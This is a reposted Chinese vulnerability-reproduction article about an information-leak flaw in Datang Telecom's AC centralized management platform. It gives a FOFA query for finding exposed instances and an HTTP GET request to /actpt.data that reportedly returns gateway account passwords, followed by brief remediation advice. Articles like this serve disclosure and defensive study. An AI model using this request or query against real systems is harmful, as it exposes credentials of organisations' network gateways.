大唐电信AC集中管理平台敏感信息泄漏漏洞复现 [附POC]

这篇具有很好参考价值的文章主要介绍了大唐电信AC集中管理平台敏感信息泄漏漏洞复现 [附POC]。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

大唐电信AC集中管理平台敏感信息泄漏漏洞复现 [附POC]

0x01 前言

免责声明:请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用!!!

0x02 漏洞描述

大唐电信科技股份有限公司是电信科学技术研究院(大唐电信科技产业集团)控股的的高科技企业,大唐电信已形成集成电路设计、软件与应用、终端设计、移动互联网四大产业板块。

大唐电信AC集中管理平台存在敏感信息泄漏漏洞。攻击者利用此漏洞可获取大唐电信AC终端管理平台控制的网关敏感信息。

0x03 影响版本

大唐电信AC终端管理平台

0x04 漏洞环境

FOFA语法:app=“大唐电信AC集中管理平台” && fid=“gmqJFLGz7L/7TdQxUJFBXQ==”
大唐电信AC集中管理平台敏感信息泄漏漏洞复现 [附POC],安全,系统安全,网络安全,web安全

0x05 漏洞复现

1.访问漏洞环境

大唐电信AC集中管理平台敏感信息泄漏漏洞复现 [附POC],安全,系统安全,网络安全,web安全

2.构造POC

POC (GET)

GET /actpt.data HTTP/1.1
Host: ip:port
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

3.复现

大唐电信AC集中管理平台敏感信息泄漏漏洞复现 [附POC],安全,系统安全,网络安全,web安全可以获取到网关账号密码信息。文章来源地址https://www.toymoban.com/news/detail-715423.html

0x06 修复建议

 1. 开启访问限制 
 2. 升级新版本

到了这里,关于大唐电信AC集中管理平台敏感信息泄漏漏洞复现 [附POC]的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • 电信物联网开放平台对接流程

    电信物联网开放平台对接流程如下图所示: 1、创建 APP 应用 登录中国电信物联网开放平台对接测试环境SP Portal(https://180.101.147.135:8843),初次登录需要修改初始密码。 选择【应用管理】-【应用】点击右上角“+创建应用”。 典型的 NB-IoT 应用的参数设置可参考如下设置:

    2024年02月01日
    浏览(38)
  • Jenkins 敏感信息实战指南

    在 Jenkins 中,安全地管理敏感信息对于构建和部署过程至关重要。本实战指南将详细介绍如何添加凭据、使用 HashiCorp Vault 插件,并通过创建 Pipeline 脚本、在 shell 脚本中使用,以及在 Python 脚本中使用来管理敏感信息。 登录 Jenkins 控制台。 在左侧导航栏选择 \\\"Manage Jenkins\\\"。

    2024年01月18日
    浏览(33)
  • pikachu靶场-敏感信息泄露

    敏感信息泄漏简述 攻击方式 常见的攻击方式主要是扫描应用程序获取到敏感数据 漏洞原因 应用维护或者开发人员无意间上传敏感数据,如 github 文件泄露 敏感数据文件的权限设置错误,如网站目录下的数据库备份文件泄露 网络协议、算法本身的弱点,如 telent、ftp、md5 等

    2024年02月09日
    浏览(40)
  • LARAVEL敏感信息泄漏

    入行四个月了见到了很多没见过的漏洞,学习一下 LARAVEL敏感信息泄漏 高危 漏洞描述:在 laravel 框架的根目录下存在配置文件,该文件存储了 debug 的配置、mysql账号密码、邮箱账号密码、redis 密码等信息。如果访问控制不当会导致文件泄露敏感信息。 解决方案:关闭 larave

    2024年02月02日
    浏览(65)
  • 三、敏感信息泄露漏洞

    一、漏洞简述 二、数据类型 三、信息分类 1、系统敏感信息泄露 2、个人敏感信息泄露 四、修复建议

    2024年02月16日
    浏览(43)
  • 【漏洞复现】大华智慧园区综合管理平台信息泄露漏洞

            大华智慧园区综合管理平台是一款综合管理平台,具备园区运营、资源调配和智能服务等功能。该平台旨在协助优化园区资源分配,满足多元化的管理需求,同时通过提供智能服务,增强使用体验。         大华智慧园区综合管理平台存在信息泄露漏洞,攻击

    2024年02月22日
    浏览(38)
  • jsp946+java物流信息管理平台-sqlserver

    本系统是一个独立的系统,用来解决物流信息信息的管理问题。采用JSP技术构建了一个有效而且实用的物流信息信息管理平台,目的是为高效地完成对物流信息信息的管理。 1、内部办公功能:包含工作计划、通告管理、公文管理;    包括可以修改添加删除所有网站首页的

    2023年04月26日
    浏览(34)
  • 史上最全面的敏感信息收集方案

    介绍一款目录渗透工具: ffuf ffuf Fast web fuzzer written in Go,速度快,自定义性高,非常好用 这里贴出一个我常用的脚本:(这里注意域名或IP后面要加上 /FUZZ ) 语雀( http://yuque.com )是一个企业级协作服务,提供文档、表格、项目管理等协作工具,帮助企业沉淀、整理内部信

    2024年02月05日
    浏览(51)
  • 实战敏感信息泄露高危漏洞挖掘利用

    信息泄露就是某网站某公司对敏感数据没有安全的保护,导致泄露敏感被攻击者利用,例如泄露:账号,密码,管理员,身份证,数据库,服务器,敏感路径等等 如果进了业务系统可以SQL注入,文件上传,getshell获取服务器权限高危操作 例如: 可以根据账号,猜测默认密码

    2023年04月08日
    浏览(39)
  • 【Android】logcat日志敏感信息泄露

    之前会遇到一些应用logcat打印敏感信息,包括但不限于账号密码,cookie凭证,或一些敏感的secretkey之类的,下面客观的记录下起危害性。  1. logcat logcat是Android系统提供的一种记录日志的工具。它可以帮助开发人员诊断应用程序中的问题,例如崩溃、内存泄漏和性能问题。l

    2024年02月07日
    浏览(38)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包